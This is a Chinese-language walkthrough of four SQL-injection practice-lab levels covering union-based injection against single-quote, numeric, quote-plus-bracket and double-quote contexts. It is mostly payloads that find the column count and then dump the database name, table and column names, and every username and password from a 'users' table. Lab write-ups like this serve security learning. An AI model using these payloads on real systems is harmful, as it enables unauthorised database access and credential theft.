第一题~第四题:回显注入
1.字符串:单引号'闭合
判断注入类型
id=1
id=1 and 1=2
id=1'
说明为字符型注入 源代码:id='$id' LIMIT 0,1 构造:id='1'' LIMIT 0,1 报错: '1'' LIMIT 0,1'(最外面的' '是回显时添加的)
id=-1' --+
说明sql为单引号闭合
id=1' order by 3正常
id=1' order by 4报错
判断字段数为3
id=-1' union select 1,2,3 判断可利用字段数
爆库:
id=-1' union select 1,database(),3--+
爆表:
id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
爆字段名:
id=-1 ' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' --+
爆字段值:
id=-1 ' union select 1,group_concat(username),group_concat(password) from users --+
2.数字型注入
id=1
id =1 and 1=2
说明为数字型注入
后面操作同第一题
3.字符串: '单引号+()括号闭合
id=1
id=1 and 1=2
均正常
id=1'
说明为字符型注入,sql为'单引号+()括号闭合
后续操作如第一题
4.字符串:"双引号+(括号)闭合
id=1"
说明存在字符型注入,sql为"双引号+(括号)闭合
后续操作如第一题